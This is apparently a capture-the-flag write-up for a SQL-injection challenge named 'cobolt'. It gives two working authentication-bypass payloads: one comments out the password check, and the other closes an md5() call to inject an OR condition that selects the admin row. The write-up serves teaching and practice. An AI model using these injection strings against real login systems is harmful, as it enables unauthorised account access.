
cobolt


We are provided with the SQL query:

SELECT id FROM prob_cobolt WHERE id='{$_GET[id]}' AND pw=md5('{$_GET[pw]}')

This time the application requires the query to return the row whose id is admin, and we do not know admin's password.

Method 1

In order to make the query return the admin row without knowing the password, we can close the id string and comment out the rest of the statement with the following URI parameter (when sent in the URL the spaces must be encoded as `%20` or `+`, since `--` only starts a comment when it is followed by whitespace):

?id=admin' -- -

The resultant query then becomes:

SELECT id FROM prob_cobolt WHERE id='admin' -- -' AND pw=md5('')

## Queried part:
SELECT id FROM prob_cobolt WHERE id='admin'

## Commented part:
-- -' AND pw=md5('')

Everything after `--` is a comment, so the password check is never evaluated; the only remaining condition is id='admin', which matches the admin row and the query returns it.


Method 2

We can also make the statement true without a comment, by closing the md5() call inside the pw parameter and appending an OR condition:

?pw=') OR (id='admin

With no id parameter supplied, the resultant query will be:

SELECT id FROM prob_cobolt WHERE id='' AND pw=md5('') OR (id='admin')

The injected `')` closes the md5('...') call, and the application's own trailing `')` closes the parenthesis we opened. Because AND binds tighter than OR, the WHERE clause is evaluated as (id='' AND pw=md5('')) OR (id='admin'): the left side is false for every row, but the right side is true for the admin row, so the query returns admin.
